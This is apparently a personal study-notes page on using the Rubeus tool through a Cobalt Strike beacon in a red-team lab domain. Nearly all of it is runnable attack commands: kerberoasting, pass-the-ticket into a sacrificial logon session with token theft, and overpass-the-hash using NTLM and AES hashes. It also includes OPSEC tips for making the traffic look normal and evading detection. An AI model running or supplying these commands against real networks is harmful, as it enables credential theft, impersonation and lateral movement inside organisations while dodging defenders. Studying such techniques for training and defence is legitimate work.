🪴 Quartz 4.0

Search

SearchSearch

rubeus

Apr 19, 20242 min read

rubeus

usage

kerberoasting

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap

Pass-the-Ticket (Kerberos)

Adds kerberos tickets to an existing logon session (LUID)

The first step is to create a blank, “sacrificial” logon session that we can pass the TGT into.  We do this because a logon session can only hold a single TGT at a time.  If we passed jking’s TGT into the LUID for bfarmer, it would erase bfarmer’s TGT and cause all sorts of authentication issues for the user.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
 
 # -> this has a new LUID (can be seen in output), import ticket into the LUID
 
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
 
# -> steal token from the new process
 
# now impersonate that session
beacon> steal_token 4748
 
# revert back and clean up
beacon> rev2self
beacon> kill 4748

By default a random user/password will be used for the new process, we can make this appear less suspicious by using more common names:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123

overpass-the-hash

Overpass the hash is a technique which allows us to request a Kerberos TGT for a user, using their NTLM or AES hash.  Elevated privileges are required to obtain user hashes, but not to actually request a ticket.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap
 
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap

The TGT can then be used via pass-the-ticket.

OPSEC: we can change the requet id and the used domain to better fit standard TGT traffic:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /domain:DEV /opsec /nowrap

Graph View

Backlinks

  • No backlinks found